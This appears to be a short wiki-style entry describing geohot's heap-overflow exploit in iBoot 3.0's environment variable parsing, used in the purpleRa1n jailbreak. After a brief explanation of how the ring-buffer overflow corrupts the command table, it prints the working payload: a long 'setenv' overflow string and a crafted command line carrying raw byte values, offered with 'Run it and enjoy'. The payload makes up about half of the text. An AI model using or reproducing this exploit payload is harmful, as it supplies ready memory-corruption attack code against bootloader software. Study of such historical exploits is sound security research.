IBoot Environment Variable Overflow

This is an exploit in iBoot's parsing of commands and environment variables.

Credit
geohot

Explanation
This is a heap overflow in 3.0's iBoot.

My implementation saves the first 8 bytes in overruns(important or phone crashes), and overwrites the first 8 bytes of the '?' environment variable in the ring buffer. When the ring buffer is freed, it attempts to close the ring. In doing so, it changes the command table to have an entry at 0x41000000, where I then(must be done after or else cmd pointer gets overwritten) upload the geohot command. Run it and enjoy.

Implementation in purplera1n
setenv a bbbbbbbbb1bbbbbbbbb2bbbbbbbbb3bbbbbbbbb4bbbbbbbbb5bbbbbbbbb6bbbbbbbbb7bbbbbbbbb8bbbbbbbbb9bbbbbbbbbAbbbbbbbbbBbbbbbbbbbCbbbbbbbbbDbbbbbbbbbEbbbbbbbbbbbbtbbbbbbbbbubbbbbbbbbvbbbbbbbbbwbbbbbbbbbxbbbbbbbbbybbbbbbbbbzbbbbbbbbbHbbbbbbbbbIbbbbbbbbbJbbbbgeohotbbbbbbbbbLbbbbbbbbbMbbbbbbbbbNbbbbbbbbbObbbbbbbbbPbbbbbbbbbbQbbbbbbbbbRbbbbbbbbbSbbbbbbbbbTbbbbbbbbbUbbbbbbbbbVbbbbbbbbbWbbbbbbb

xxxx $a $a $a $a geohotaaaa \"\x04\x01\" \\ \"\x0c\" \\ \\ \\ \\ \\ \"\x41\x04\xA0\x02\" \\ \\ \\ \\ wwww;echo copyright;echo geohot